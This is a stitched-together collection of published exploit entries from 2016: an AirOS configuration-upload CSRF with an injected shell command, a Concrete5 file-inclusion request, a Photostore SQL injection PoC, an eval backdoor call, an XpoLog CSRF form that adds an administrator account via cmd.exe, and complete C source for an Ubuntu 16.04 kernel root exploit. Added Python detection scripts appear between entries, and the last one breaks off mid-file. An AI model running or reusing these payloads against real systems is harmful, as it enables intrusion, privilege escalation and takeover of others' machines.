          "wireless.1.wds.status=disabled\n" + 
          "wireless.1.wds.6.peer=\n" + 
          "wireless.1.wds.5.peer=\n" + 
          "wireless.1.wds.4.peer=\n" + 
          "wireless.1.wds.3.peer=\n" + 
          "wireless.1.wds.2.peer=\n" + 
          "wireless.1.wds.1.peer=\n" + 
          "wireless.1.status=enabled\n" + 
          "wireless.1.ssid=www.ubnt.com\n" + 
          "wireless.1.security.type=none\n" + 
          "wireless.1.scan_list.status=disabled\n" + 
          "wireless.1.mac_acl.policy=allow\n" + 
          "wireless.1.mac_acl.status=disabled\n" + 
          "wireless.1.hide_ssid=disabled\n" + 
          "wireless.1.devname=ath0\n" + 
          "wireless.1.autowds=disabled\n" + 
          "wireless.1.authmode=1\n" + 
          "wireless.1.ap=\n" + 
          "wireless.1.addmtikie=enabled\n" + 
          "vlan.status=disabled\n" + 
          "users.status=enabled\n" + 
          "users.1.status=enabled\n" + 
          "users.1.password=VvpvCwhccFv6Q\n" + 
          "users.1.name=ubnt\n" + 
          "upnpd.devname=\n" + 
          "upnpd.status=disabled\n" + 
          "tshaper.status=disabled\n" + 
          "telnetd.status=enabled\n" + 
          "telnetd.port=23\n" + 
          "system.modules.blacklist.status=disabled\n" + 
          "system.eirp.status=disabled\n" + 
          "system.cfg.version=65542\n" + 
          "syslog.status=disabled\n" + 
          "syslog.remote.status=\n" + 
          "sshd.status=enabled\n" + 
          "sshd.port=22\n" + 
          "sshd.auth.passwd=enabled\n" + 
          "snmp.status=disabled\n" + 
          "route.1.devname=eth0\n" + 
          "route.1.status=disabled\n" + 
          "route.1.comment=\n" + 
          "route.1.gateway=0.0.0.0\n" + 
          "route.1.netmask=0\n" + 
          "route.1.ip=0.0.0.0\n" + 
          "route.status=enabled\n" + 
          "resolv.nameserver.2.status=enabled\n" + 
          "resolv.nameserver.2.ip=\n" + 
          "resolv.nameserver.1.status=enabled\n" + 
          "resolv.nameserver.1.ip=\n" + 
          "resolv.status=disabled\n" + 
          "radio.status=enabled\n" + 
          "radio.countrycode=840\n" + 
          "radio.1.txpower=18\n" + 
          "radio.1.subsystemid=0xe4c2\n" + 
          "radio.1.status=enabled\n" + 
          "radio.1.reg_obey=disabled\n" + 
          "radio.1.rate.mcs=7\n" + 
          "radio.1.rate.auto=enabled\n" + 
          "radio.1.obey=disabled\n" + 
          "radio.1.mode=master\n" + 
          "radio.1.mcastrate=\n" + 
          "radio.1.low_txpower_mode=disabled\n" + 
          "radio.1.ieee_mode=11nght20\n" + 
          "radio.1.freq=0\n" + 
          "radio.1.forbiasauto=1\n" + 
          "radio.1.dfs.status=enabled\n" + 
          "radio.1.devname=ath0\n" + 
          "radio.1.cwm.mode=0\n" + 
          "radio.1.cwm.enable=0\n" + 
          "radio.1.countrycode=840\n" + 
          "radio.1.clksel=1\n" + 
          "radio.1.chanshift=\n" + 
          "radio.1.chanbw=0\n" + 
          "radio.1.antenna.id=4\n" + 
          "radio.1.acktimeout=25\n" + 
          "radio.1.ackdistance=600\n" + 
          "pwdog.status=enabled\n" + 
          "pwdog.retry=3\n" + 
          "pwdog.period=300\n" + 
          "pwdog.host=8.8.8.8\n" + 
          "pwdog.delay=300\n" + 
          "ppp.status=disabled\n" + 
          "ntpclient.status=enabled\n" + 
          "ntpclient.1.status=enabled\n" + 
          "ntpclient.1.server=0.ubnt.pool.ntp.org\n" + 
          "netmode=soho\n" + 
          "netconf.5.up=enabled\n" + 
          "netconf.5.hwaddr.mac=\n" + 
          "netconf.5.hwaddr.status=disabled\n" + 
          "netconf.5.autoip.status=disabled\n" + 
          "netconf.5.role=mlan\n" + 
          "netconf.5.mtu=1500\n" + 
          "netconf.5.devname=eth0\n" + 
          "netconf.5.status=disabled\n" + 
          "netconf.4.up=enabled\n" + 
          "netconf.4.netmask=255.255.255.0\n" + 
          "netconf.4.ip=0.0.0.0\n" + 
          "netconf.4.hwaddr.mac=\n" + 
          "netconf.4.hwaddr.status=disabled\n" + 
          "netconf.4.autoip.status=disabled\n" + 
          "netconf.4.role=bridge_port\n" + 
          "netconf.4.mtu=1500\n" + 
          "netconf.4.devname=eth1\n" + 
          "netconf.4.status=enabled\n" + 
          "netconf.3.up=enabled\n" + 
          "netconf.3.netmask=255.255.255.0\n" + 
          "netconf.3.ip=192.168.1.1\n" + 
          "netconf.3.hwaddr.mac=\n" + 
          "netconf.3.hwaddr.status=disabled\n" + 
          "netconf.3.autoip.status=disabled\n" + 
          "netconf.3.role=lan\n" + 
          "netconf.3.mtu=1500\n" + 
          "netconf.3.devname=br0\n" + 
          "netconf.3.status=enabled\n" + 
          "netconf.2.up=enabled\n" + 
          "netconf.2.promisc=enabled\n" + 
          "netconf.2.netmask=255.255.255.0\n" + 
          "netconf.2.ip=0.0.0.0\n" + 
          "netconf.2.hwaddr.mac=\n" + 
          "netconf.2.hwaddr.status=disabled\n" + 
          "netconf.2.autoip.status=disabled\n" + 
          "netconf.2.role=bridge_port\n" + 
          "netconf.2.mtu=1500\n" + 
          "netconf.2.devname=ath0\n" + 
          "netconf.2.status=enabled\n" + 
          "netconf.1.up=enabled\n" + 
          "netconf.1.promisc=enabled\n" + 
          "netconf.1.netmask=255.255.255.0\n" + 
          "netconf.1.ip=0.0.0.0\n" + 
          "netconf.1.hwaddr.mac=\n" + 
          "netconf.1.hwaddr.status=disabled\n" + 
          "netconf.1.autoip.status=disabled\n" + 
          "netconf.1.role=wan\n" + 
          "netconf.1.mtu=1500\n" + 
          "netconf.1.devname=eth0\n" + 
          "netconf.1.status=enabled\n" + 
          "netconf.status=enabled\n" + 
          "iptables.sys.upnpd.devname=\n" + 
          "iptables.sys.upnpd.status=disabled\n" + 
          "iptables.sys.status=enabled\n" + 
          "iptables.sys.portfw.status=disabled\n" + 
          "iptables.sys.mgmt.status=disabled\n" + 
          "iptables.sys.masq.1.status=enabled\n" + 
          "iptables.sys.masq.1.devname=eth0\n" + 
          "iptables.sys.masq.status=enabled\n" + 
          "iptables.sys.fw.status=disabled\n" + 
          "iptables.sys.dmz.status=disabled\n" + 
          "iptables.1.comment=\n" + 
          "iptables.1.cmd=-A FIREWALL -j ACCEPT; touch /var/hacked.txt\n" + 
          "iptables.1.status=enabled\n" + 
          "iptables.status=enabled\n" + 
          "igmpproxy.status=enabled\n" + 
          "igmpproxy.upstream.devname=eth0\n" + 
          "igmpproxy.1.downstream.devname=br0\n" + 
          "httpd.status=enabled\n" + 
          "httpd.session.timeout=900\n" + 
          "httpd.port=80\n" + 
          "httpd.https.status=enabled\n" + 
          "httpd.https.port=443\n" + 
          "gui.wlan.advanced.status=disabled\n" + 
          "gui.network.advanced.status=enabled\n" + 
          "ebtables.sys.vlan.status=disabled\n" + 
          "ebtables.sys.status=enabled\n" + 
          "ebtables.sys.eap.status=disabled\n" + 
          "ebtables.sys.eap.1.status=enabled\n" + 
          "ebtables.sys.eap.1.devname=ath0\n" + 
          "ebtables.sys.arpnat.status=disabled\n" + 
          "ebtables.sys.arpnat.1.status=enabled\n" + 
          "ebtables.sys.arpnat.1.devname=ath0\n" + 
          "ebtables.status=enabled\n" + 
          "dyndns.status=disabled\n" + 
          "dnsmasq.status=disabled\n" + 
          "dnsmasq.1.status=disabled\n" + 
          "dnsmasq.1.devname=eth0\n" + 
          "discovery.status=enabled\n" + 
          "discovery.cdp.status=enabled\n" + 
          "dhcpd.1.start=192.168.1.2\n" + 
          "dhcpd.1.netmask=255.255.255.0\n" + 
          "dhcpd.1.lease_time=600\n" + 
          "dhcpd.1.end=192.168.1.254\n" + 
          "dhcpd.1.dnsproxy=enabled\n" + 
          "dhcpd.1.devname=br0\n" + 
          "dhcpd.1.dns.2.status=disabled\n" + 
          "dhcpd.1.dns.2.server=\n" + 
          "dhcpd.1.dns.1.status=disabled\n" + 
          "dhcpd.1.dns.1.server=\n" + 
          "dhcpd.1.status=enabled\n" + 
          "dhcpd.status=enabled\n" + 
          "dhcpc.1.status=enabled\n" + 
          "dhcpc.1.fallback_netmask=255.255.255.0\n" + 
          "dhcpc.1.fallback=192.168.10.1\n" + 
          "dhcpc.1.devname=eth0\n" + 
          "dhcpc.status=enabled\n" + 
          "bridge.1.fd=1\n" + 
          "bridge.1.comment=\n" + 
          "bridge.1.port.2.devname=eth1\n" + 
          "bridge.1.port.2.status=enabled\n" + 
          "bridge.1.port.1.devname=ath0\n" + 
          "bridge.1.port.1.status=enabled\n" + 
          "bridge.1.stp.status=disabled\n" + 
          "bridge.1.devname=br0\n" + 
          "bridge.1.status=enabled\n" + 
          "bridge.status=enabled\n" + 
          "aaa.status=disabled\n" + 
          "aaa.1.status=disabled\n" + 
          "aaa.1.radius.macacl.status=disabled\n" + 
          "aaa.1.radius.auth.1.status=disabled\n" + 
          "\r\n" + 
          "-----------------------------761818923593135447208368355\r\n" + 
          "Content-Disposition: form-data; name=\"cfgupload\"\r\n" + 
          "\r\n" + 
          "Upload\r\n" + 
          "-----------------------------761818923593135447208368355\r\n" + 
          "Content-Disposition: form-data; name=\"action\"\r\n" + 
          "\r\n" + 
          "cfgupload\r\n" + 
          "-----------------------------761818923593135447208368355\r\n" + 
          "Content-Disposition: form-data; name=\"systemdate\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------761818923593135447208368355--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
     submitRequest();
     document.getElementById("airos-exploit-apply").submit();
     </script>
  </body>
</html>

<!--
The contents of this advisory are copyright(c) 2016
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
-->
            
-------------------------------------------------------------------------------
Concrete5 <= 5.7.3.1 (Application::dispatch) Local File Inclusion Vulnerability
-------------------------------------------------------------------------------


[-] Software Link:

https://www.concrete5.org/


[-] Affected Versions:

Version 5.7.3.1 and probably other versions.


[-] Vulnerability Description:

The vulnerable code is located within the "Application::dispatch()" method:

public function dispatch(Request $request)
{
    if ($this->installed) {
        $response = $this->getEarlyDispatchResponse();
    }
    if (!isset($response)) {
        $collection = Route::getList();
        $context = new \Symfony\Component\Routing\RequestContext();
        $context->fromRequest($request);
        $matcher = new UrlMatcher($collection, $context);
        $path = rtrim($request->getPathInfo(), '/') . '/';
        try {
            $request->attributes->add($matcher->match($path));
            $matched = $matcher->match($path);
            $route = $collection->get($matched['_route']);
            Route::setRequest($request);
            $response = Route::execute($route, $matched);

The vulnerability exists because the path for the incoming request is retrieved using the
"Request::getPathInfo()" method from the Symfony framework, which allows the request path to be
supplied through certain HTTP headers (such as "X-Original-URL" and some others). It is therefore
possible to specify paths containing "dot-dot-slash" sequences without worrying about the URL
encoding and path normalization done by the web server. This could be exploited by unauthenticated
attackers to include arbitrary .php files located outside the Concrete5 root directory or from the
Concrete5 codebase itself (potentially leading to unauthorized access to certain functionalities)
by sending an HTTP request like this:

GET /concrete5/index.php HTTP/1.1
Host: localhost
X-Original-Url: /tools/../../index
Connection: keep-alive

The dispatching process for this request will try to re-include the index.php file,
and this will end up with an unexpected error.
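The following is an added detection example, not code from Concrete5 or Symfony: it parses a raw request, works out which source the dispatch path would come from (an override header wins over the request line, as the advisory describes), and flags traversal that bypassed the web server's normalization. The sample request is constructed from the one above; X-Rewrite-URL is the other IIS rewrite header Symfony's Request consults.

```python
from urllib.parse import unquote

# Headers Symfony's Request honours in place of the request-line path.
OVERRIDE_HEADERS = ("x-original-url", "x-rewrite-url")


def parse_request(raw):
    """Split a raw HTTP request head into (method, target, headers).
    Header names are lower-cased so lookups are case-insensitive."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, target, headers


def effective_path(target, headers):
    """Return (source, path) for the path the dispatcher would act on:
    an override header wins over the request line when present."""
    for name in OVERRIDE_HEADERS:
        if name in headers:
            return name, headers[name]
    return "request-line", target.split("?", 1)[0]


def resolve(path):
    """Collapse '.' and '..' segments after percent-decoding.
    Returns (normalized, escaped_root); escaped_root is True when a '..'
    tried to climb above '/', which the web server's own normalisation
    would have caught had the path been in the request line."""
    stack, escaped = [], False
    for seg in unquote(path).split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if stack:
                stack.pop()
            else:
                escaped = True
            continue
        stack.append(seg)
    return "/" + "/".join(stack), escaped


def check_request(raw):
    """Classify one request; 'suspicious' means the dispatch path came
    from a header *and* contains traversal segments."""
    _method, target, headers = parse_request(raw)
    source, path = effective_path(target, headers)
    normalized, escaped = resolve(path)
    has_traversal = ".." in unquote(path).split("/")
    return {
        "source": source,
        "raw_path": path,
        "normalized": normalized,
        "has_traversal": has_traversal,
        "escapes_root": escaped,
        "suspicious": source != "request-line" and has_traversal,
    }


# Constructed sample, modelled on the request shown in the advisory.
SAMPLE = (
    "GET /concrete5/index.php HTTP/1.1\r\n"
    "Host: localhost\r\n"
    "X-Original-Url: /tools/../../index\r\n"
    "Connection: keep-alive\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for key, value in check_request(SAMPLE).items():
        print(f"{key:>14}: {value}")
```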


[-] Solution:

Update to a fixed version.


[-] Disclosure Timeline:

[05/05/2015] - Vulnerability details sent through HackerOne
[02/10/2015] - CVE number requested
[19/12/2015] - Vulnerability fixed on the GitHub repository
[26/06/2016] - Vulnerability publicly disclosed on HackerOne
[28/06/2016] - Publication of this advisory


[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has not assigned a CVE identifier for this vulnerability.


[-] Credits:

Vulnerability discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2016-10


[-] Other References:

https://hackerone.com/reports/59665
            
Title       : Ktools Photostore <= 4.7.5 (Pre-Authentication) Blind SQL Injection
CVE-ID      : CVE-2016-4337
Google Dork: inurl:mgr.login.php
Product     : Photostore
Affected    : Versions prior to 4.7.5
Impact      : Critical
Remote      : Yes
Website link: http://www.ktools.net
Reported    : 02/06/2016
Authors     : Gal Goldshtein and Viktor Minin
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
No authentication (login) is required to exploit this vulnerability.
The password recovery module of the Photostore application is prone to a blind SQL injection attack.
An attacker can exploit this vulnerability to retrieve all the data stored in the application's database.


Vulnerable code is located in the mgr.login.php file:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
case 'recover_login': {
    // $_POST['email'] is spliced straight into the SQL text without escaping
    $result = mysqli_query( $db, 'SELECT username,password,email,admin_id FROM ' . $dbinfo['pre'] . 'admins where email = \'' . $_POST['email'] . '\'' );
    $returned_rows = mysqli_num_rows( $result );
    $db_admin_user = mysqli_fetch_array( $result );
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

PoC:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
POST /photostore/manager/mgr.login.php?pmode=recover_login HTTP/1.1
Host: victim.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://server/photostore/manager/mgr.login.php?username=demo&password=demo
Cookie: member[umem_id]=58C05864CA6A59DBGHJSKDHGDGS770D5; PHPSESSID=30afayreighgfdgucb0d2b0c6dece3158
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 9

email=%27%20[SQL PAYLOAD];#
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
            
# Exploit Title: Phoenix Exploit Kit - Remote Code Execution
# Exploit Author: CrashBandicot @DosPerl
# Date: 2016-06-30
# Tested on: MSWin32
 
# Vuln file : geoip.php
 
isset($_GET['bdr']) ? eval($_GET['bdr']) : explode('nop','nop nop nop');
 
# PoC : http://localhost/Phoenix/includes/geoip.php?bdr=phpinfo();

# Screen : http://i.imgur.com/E7RBBRk.png

__END__
            

XpoLog Center V6 CSRF Remote Command Execution


Vendor: XpoLog LTD
Product web page: http://www.xpolog.com
Affected version: 6.4469
                  6.4254
                  6.4252
                  6.4250
                  6.4237
                  6.4235
                  5.4018

Summary: Applications Log Analysis and Management Platform.

Desc: XpoLog suffers from arbitrary command execution. Attackers
can exploit this issue through the task tool feature by adding a
task that runs a given binary with the supplied arguments.
In combination with the CSRF, an attacker can execute system commands
with SYSTEM privileges.

Tested on: Apache-Coyote/1.1
           Microsoft Windows Server 2012
           Microsoft Windows 7 Professional SP1 EN 64bit
           Java/1.7.0_45
           Java/1.8.0.91


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5335
Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2016-5335.php


14.06.2016

--


exePath = "C:\\windows\\system32\\cmd.exe"
exeArgs = "/C net user EVIL pass123 /add & net localgroup Administrators EVIL /add"

<html>
  <body>
    <form action="http://10.0.0.17:30303/logeye/tasks/xpotaskDefinitionAction.jsp?" method="POST">
      <input type="hidden" name="" value="" />
      <input type="hidden" name="csrfToken" value="NoToken" />
      <input type="hidden" name="taskId" value="1465930398522" />
      <input type="hidden" name="taskType" value="exe" />
      <input type="hidden" name="name" value="CCMMDD" />
      <input type="hidden" name="description" value="ZSL" />
      <input type="hidden" name="IsSsh" value="false" />
      <input type="hidden" name="exePath" value=""c&#58;&#92;&#92;windows&#92;&#92;system32&#92;&#92;cmd&#46;exe"" />
      <input type="hidden" name="exeArgs" value=""&#47;C&#32;net&#32;user&#32;EVIL&#32;pass123&#32;&#47;add&#32;&&#32;net&#32;localgroup&#32;Administrators&#32;EVIL&#32;&#47;add"" />
      <input type="hidden" name="exeEnvVar" value="" />
      <input type="hidden" name="exeWorkDir" value="" />
      <input type="hidden" name="exeOutputTargetFile" value="" />
      <input type="hidden" name="NameXpoTaskSched" value="taskId&#95;1465930366962" />
      <input type="hidden" name="IdXpoTaskSched" value="taskId&#95;1465930366962" />
      <input type="hidden" name="actionIdXpoTaskSched" value="0" />
      <input type="hidden" name="StateXpoTaskSched" value="1" />
      <input type="hidden" name="schedulerSuffix" value="XpoTaskSched" />
      <input type="hidden" name="trigTypeXpoTaskSched" value="cron" />
      <input type="hidden" name="minutesXpoTaskSched" value="0" />
      <input type="hidden" name="minutesEndXpoTaskSched" value="0" />
      <input type="hidden" name="numOfExecutionsXpoTaskSched" value="0" />
      <input type="hidden" name="frequencyXpoTaskSched" value="daily" />
      <input type="hidden" name="DayInMonthXpoTaskSched" value="all" />
      <input type="hidden" name="dailyTypeXpoTaskSched" value="repeat" />
      <input type="hidden" name="dailyRepeatValueXpoTaskSched" value="1" />
      <input type="hidden" name="dailyRepeatTypeXpoTaskSched" value="second" />
      <input type="hidden" name="hoursXpoTaskSched" value="0" />
      <input type="hidden" name="hoursEndXpoTaskSched" value="0" />
      <input type="hidden" name="hoursOnce0XpoTaskSched" value="&#45;1" />
      <input type="hidden" name="minutesOnce0XpoTaskSched" value="&#45;1" />
      <input type="hidden" name="secondsOnce0XpoTaskSched" value="&#45;1" />
      <input type="hidden" name="jobPriority" value="&#45;1" />
      <input type="hidden" name="ajaxTimestamp" value="1465930905166" />
      <input type="submit" value="Submit" />
    </form>
  </body>
</html>

--

exePath = "C:\\windows\\system32\\cmd.exe"
exeArgs = "/C whoami > c:\\Progra~1\\XpoLogCenter6\\defaultroot\\logeye\\testingus.txt"


GET
http://10.0.0.17:30303/logeye/testingus.txt

Response:

nt authority\system
            
/*
Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40053.zip
*/

--------------------------------------------------- decr.c ---------------------------------------------------
/**
 * Ubuntu 16.04 local root exploit - netfilter target_offset OOB
 * check_compat_entry_size_and_hooks/check_entry
 *
 * Tested on 4.4.0-21-generic. SMEP/SMAP bypass available in descr_v2.c
 *
 * Vitaly Nikolenko
 * vnik@cyseclabs.com
 * 23/04/2016
 *
 *
 * ip_tables.ko needs to be loaded (e.g., iptables -L as root triggers
 * automatic loading).
 *
 * vnik@ubuntu:~$ uname -a
 * Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 * vnik@ubuntu:~$ gcc decr.c -m32 -O2 -o decr
 * vnik@ubuntu:~$ gcc pwn.c -O2 -o pwn
 * vnik@ubuntu:~$ ./decr 
 * netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik
 * [!] Decrementing the refcount. This may take a while...
 * [!] Wait for the "Done" message (even if you'll get the prompt back).
 * vnik@ubuntu:~$ [+] Done! Now run ./pwn
 * 
 * vnik@ubuntu:~$ ./pwn
 * [+] Escalating privs...
 * root@ubuntu:~# id
 * uid=0(root) gid=0(root) groups=0(root)
 * root@ubuntu:~# 
 * 
 */

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sched.h>
#include <linux/sched.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ptrace.h>
#include <netinet/in.h>
#include <net/if.h>
#include <linux/netfilter_ipv4/ip_tables.h>
#include <linux/netlink.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <stdint.h>   /* uint32_t / uint64_t used below */

#define MALLOC_SIZE 66*1024

int check_smaep() {
	FILE *proc_cpuinfo;
	char fbuf[512];

	proc_cpuinfo = fopen("/proc/cpuinfo", "r");

	if (proc_cpuinfo == NULL) {   /* fopen() returns NULL on failure, never a negative pointer */
		perror("fopen");
		return -1;
	}

	memset(fbuf, 0, sizeof(fbuf));
	
	while(fgets(fbuf, 512, proc_cpuinfo) != NULL) {
		if (strlen(fbuf) == 0)
			continue;
		
		if (strstr(fbuf, "smap") || strstr(fbuf, "smep")) {
			fclose(proc_cpuinfo);
			return -1;
		}
	}

	fclose(proc_cpuinfo);
	return 0;
}

int check_mod() {
	FILE *proc_modules;
	char fbuf[256];

	proc_modules = fopen("/proc/modules", "r");

	if (proc_modules == NULL) {   /* fopen() returns NULL on failure, never a negative pointer */
		perror("fopen");
		return -1;
	}

	memset(fbuf, 0, sizeof(fbuf));
	
	while(fgets(fbuf, 256, proc_modules) != NULL) {
		if (strlen(fbuf) == 0)
			continue;
		
		if (!strncmp("ip_tables", fbuf, 9)) {
			fclose(proc_modules);
			return 0;
		}
	}

	fclose(proc_modules);
	return -1;
}

int decr(void *p) {
	int sock, optlen;
	int ret;
	void *data;
	struct ipt_replace *repl;
	struct ipt_entry *entry;
	struct xt_entry_match *ematch;
	struct xt_standard_target *target;
	unsigned i;

	sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);

	if (sock == -1) {
	        perror("socket");
	        return -1;
	}

	data = malloc(MALLOC_SIZE);

	if (data == NULL) {
		perror("malloc");
		return -1;
	}

	memset(data, 0, MALLOC_SIZE);

	repl = (struct ipt_replace *) data;
	repl->num_entries = 1;
	repl->num_counters = 1;
	repl->size = sizeof(*repl) + sizeof(*target) + 0xffff;
	repl->valid_hooks = 0;

	entry = (struct ipt_entry *) (data + sizeof(struct ipt_replace));
	entry->target_offset = 74; // overwrite target_offset
	entry->next_offset = sizeof(*entry) + sizeof(*ematch) + sizeof(*target);

	ematch = (struct xt_entry_match *) (data + sizeof(struct ipt_replace) + sizeof(*entry));

	strcpy(ematch->u.user.name, "icmp");
	void *kmatch = (void*)mmap((void *)0x10000, 0x1000, 7, 0x32, 0, 0);
	uint64_t *me = (uint64_t *)(kmatch + 0x58);
	*me = 0xffffffff821de10d; // magic number!

	uint32_t *match = (uint32_t *)((char *)&ematch->u.kernel.match + 4);
	*match = (uint32_t)kmatch;
	
	ematch->u.match_size = (short)0xffff;

	target = (struct xt_standard_target *)(data + sizeof(struct ipt_replace) + 0xffff + 0x8);
	uint32_t *t = (uint32_t *)target;
	*t = (uint32_t)kmatch;

	printf("[!] Decrementing the refcount. This may take a while...\n");
	printf("[!] Wait for the \"Done\" message (even if you'll get the prompt back).\n");

	for (i = 0; i < 0xffffff/2+1; i++) {
		ret = setsockopt(sock, SOL_IP, IPT_SO_SET_REPLACE, (void *) data, 66*1024);
	}

	close(sock);
	free(data);
	printf("[+] Done! Now run ./pwn\n");

	return 0;
}

int main(void) {
	void *stack;
	int ret;

	printf("netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik\n");
	if (check_mod()) {
		printf("[-] No ip_tables module found! Quitting...\n");
		return -1;
	}

	if (check_smaep()) {
		printf("[-] SMEP/SMAP support detected! Quitting...\n");
		return -1;
	}

	ret = unshare(CLONE_NEWUSER);

	if (ret == -1) {
		perror("unshare");
		return -1;
	}

	stack = (void *) malloc(65536);

	if (stack == NULL) {
		perror("malloc");
		return -1;
	}

	clone(decr, stack + 65536, CLONE_NEWNET, NULL);

	sleep(1);

	return 0;
}

--------------------------------------------------- pwn.c ---------------------------------------------------

/**
 * Run ./decr first!
 *
 * 23/04/2016
 * - vnik
 */
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <stdint.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <assert.h>

#define MMAP_ADDR 0xff814e3000
#define MMAP_OFFSET 0xb0

typedef int __attribute__((regparm(3))) (*commit_creds_fn)(uint64_t cred);
typedef uint64_t __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(uint64_t cred);

void __attribute__((regparm(3))) privesc() {
	commit_creds_fn commit_creds = (void *)0xffffffff810a21c0;
	prepare_kernel_cred_fn prepare_kernel_cred = (void *)0xffffffff810a25b0;
        commit_creds(prepare_kernel_cred((uint64_t)NULL));
}

int main() {
	void *payload = (void*)mmap((void *)MMAP_ADDR, 0x400000, 7, 0x32, 0, 0);
	assert(payload == (void *)MMAP_ADDR);

	void *shellcode = (void *)(MMAP_ADDR + MMAP_OFFSET);

	memset(shellcode, 0, 0x300000);

	void *ret = memcpy(shellcode, &privesc, 0x300);
	assert(ret == shellcode);

	printf("[+] Escalating privs...\n");

	int fd = open("/dev/ptmx", O_RDWR);
	close(fd);

	assert(!getuid());

	printf("[+] We've got root!");

        return execl("/bin/bash", "-sh", NULL);
}
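As an added defender's example (not part of vnik's exploit), the script below checks the same preconditions decr.c tests for before it runs, plus the unprivileged user namespace sysctl that its unshare(CLONE_NEWUSER) call depends on; the sysctl path is the Debian/Ubuntu knob and is an assumption for other distributions, and the /proc samples are constructed for offline use.

```python
import os

# Debian/Ubuntu kernels carry this sysctl; decr.c needs unshare(CLONE_NEWUSER)
# from an unprivileged user to get CAP_NET_ADMIN in a fresh network namespace.
USERNS_SYSCTL = "/proc/sys/kernel/unprivileged_userns_clone"
VULNERABLE_RELEASE = "4.4.0-21-generic"   # the build named in the exploit header


def cpu_flags(cpuinfo_text):
    """Collect the CPU feature flags from /proc/cpuinfo text."""
    flags = set()
    for line in cpuinfo_text.splitlines():
        if line.startswith("flags"):
            flags.update(line.split(":", 1)[1].split())
    return flags


def ip_tables_loaded(modules_text):
    """/proc/modules lines start with the module name followed by a space."""
    return any(line.split(" ", 1)[0] == "ip_tables"
               for line in modules_text.splitlines() if line.strip())


def userns_unprivileged(sysctl_text):
    """True/False from the sysctl value; None when the knob is absent
    (mainline kernels allow unprivileged user namespaces by default)."""
    if sysctl_text is None:
        return None
    return sysctl_text.strip() == "1"


def assess(release, cpuinfo_text, modules_text, sysctl_text):
    """Return the individual checks and an overall 'exposed' verdict.
    The verdict mirrors decr.c: it exits when SMEP or SMAP is present or
    ip_tables is not loaded, and its unshare() fails when unprivileged
    user namespaces are disabled. Other 4.4 builds may be affected too,
    so the kernel name is reported but not used in the verdict."""
    flags = cpu_flags(cpuinfo_text)
    report = {
        "release": release,
        "named_vulnerable_build": release.startswith(VULNERABLE_RELEASE),
        "smep": "smep" in flags,
        "smap": "smap" in flags,
        "ip_tables_loaded": ip_tables_loaded(modules_text),
        "userns_unprivileged": userns_unprivileged(sysctl_text),
    }
    report["exposed"] = (
        not report["smep"] and not report["smap"]
        and report["ip_tables_loaded"]
        and report["userns_unprivileged"] is not False
    )
    return report


def read_or_none(path):
    try:
        with open(path) as fh:
            return fh.read()
    except OSError:
        return None


def assess_host():
    """Run the assessment against the live /proc of this machine."""
    return assess(os.uname().release,
                  read_or_none("/proc/cpuinfo") or "",
                  read_or_none("/proc/modules") or "",
                  read_or_none(USERNS_SYSCTL))


# Constructed /proc samples for offline use.
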